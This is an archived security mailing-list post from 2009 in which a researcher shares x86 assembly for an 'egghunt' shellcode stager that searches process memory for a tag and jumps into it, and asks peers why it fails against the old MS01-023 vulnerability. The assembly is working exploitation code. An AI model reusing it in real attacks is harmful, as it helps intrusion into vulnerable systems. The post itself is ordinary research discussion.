Dailydave mailing list archives
Merry Xmas & Happy "Search Memory for you Shellcode"...
From: "Nelson Brito" <nbrito () sekure org>
Date: Wed, 23 Dec 2009 12:16:08 -0200
Hey, fellows. I am get some spare time to work with a well-known technique called "egghunt", based on skape excellent article "Safely Searching Process Virtual Address Space" (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf). But while trying to perform this technique on a really old vulnerability (MS01-023) the egghunt doesn't work as good as I was expecting. The code: win32_syscall_forward_01 PROC start: xor edx, edx ; zeroing the edx, it is necessary to avoid BO in 'Release' inc_page: or dx, 0FFFh ; add PAGE_SIZE-1 to edx inc_byte: inc edx ; increment our pointer by one setup_syscall: push edx ; save edx on the stack push +02h ; push NtAccessCheckAndAuditAlarm pop eax ; pop into eax int 2Eh ; perform the syscall (KiSystemService()) cmp al, 05h ; did we get 0xc0000005 (STATUS_ACCESS_VIOLATION)? pop edx ; restore edx je inc_page ; yes, invalid pointer, go to the next page setup_badge: mov eax, "NBNB" ; throw our badge in eax check_badge: mov edi, edx ; set edi to the pointer we validated scasd ; compare the dword in edi to eax jnz inc_byte ; no match? increment the pointer by one scasd ; compare the dword in edi to eax again - which is now eax + 3 jnz inc_byte ; no match? increment the pointer by one badge_found: jmp edi ; found the badge, jump 8 bytes past it into our code win32_syscall_forward_01 ENDP Well, I called this "forward" because it will try to find the code from "the place" BO happens to the end of STACK. Am I right? But in this vulnerability the stager shellcode will be placed in somewhere on the BUTTOM of the STACK, right? /* * $Id: .siganture,v 1.3 2009-12-11 09:22:54-02 nbrito Exp $ * * Author: Nelson Brito <nbrito [at] sekure [dot] org> Copyright(c) 2004-2009 Nelson Brito. All rights reserved worldwide. http://fnstenv.blogspot.com */ _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Merry Xmas & Happy "Search Memory for you Shellcode"... Nelson Brito (Dec 23)